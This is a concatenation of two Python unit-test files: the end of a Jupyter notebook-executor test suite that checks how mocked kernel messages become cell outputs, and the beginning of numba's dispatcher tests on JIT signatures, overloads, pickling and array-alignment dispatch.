'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}},
}
)
def test_widget_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message without buffer info followed by an idle
assert message_mock.call_count == 2
self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}})
# Buffers should still be empty
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
}
)
def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 2
assert executor.widget_state == {'foobar': {'foo': 'bar'}}
assert executor.widget_buffers == {
'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
},
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]},
},
},
)
def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 3
assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}}
assert executor.widget_buffers == {
'foobar': {
('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']},
('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']},
}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {
'comm_id': 'foobar',
# No 'state'
'data': {'foo': 'bar'},
},
}
)
def test_unknown_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An unknown comm message followed by an idle
assert message_mock.call_count == 2
# Widget states should be empty as the message has the wrong shape
assert not executor.widget_state
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_with_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
}
)
def test_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar_other'},
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_display_data_same_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 4
# Original output should be manipulated and a copy of the second now
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 2
# Display updates don't create any outputs
assert cell_mock.outputs == []
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar2'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 3
# Display updates don't create any outputs
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an update then an idle
assert message_mock.call_count == 3
# Original output should be manipulated
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
}
)
def test_error_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_and_error_status_messages(self, executor, cell_mock, message_mock):
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Cell outputs should still be copied
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# OK
'content': {'status': 'ok'},
},
)
def test_error_message_only(self, executor, cell_mock, message_mock):
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_allow_errors(self, executor, cell_mock, message_mock):
executor.allow_errors = True
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error', 'ename': 'NotImplementedError'},
}
)
def test_allow_error_names(self, executor, cell_mock, message_mock):
executor.allow_error_names = ['NotImplementedError']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_raises_exception_tag(self, executor, cell_mock, message_mock):
cell_mock.metadata['tags'] = ['raises-exception']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 1
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_no_source(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(
# Stripped source is empty
source=' ',
metadata={},
cell_type='code',
outputs=[],
)
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 0
# Should also consume the message stream
assert cell_mock.outputs == []
|
test_dispatcher.py
|
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof, errors
from numba import _dispatcher
from numba.compiler import compile_isolated
from numba.errors import NumbaWarning
from .support import (TestCase, tag, temp_directory, import_dynamic,
override_env_config, capture_cache_log, captured_stdout)
from numba.numpy_support import as_dtype
from numba.targets import codegen
from numba.caching import _UserWideCacheLocator
from numba.dispatcher import Dispatcher
from numba import parfor
from .test_linalg import needs_lapack
from .support import skip_parfors_unsupported
import llvmlite.binding as ll
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must be match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
# do we get the same object even if we delete all the explicit
# references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
# create some arrays as Cartesian production of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Sams as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
@tag('important')
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
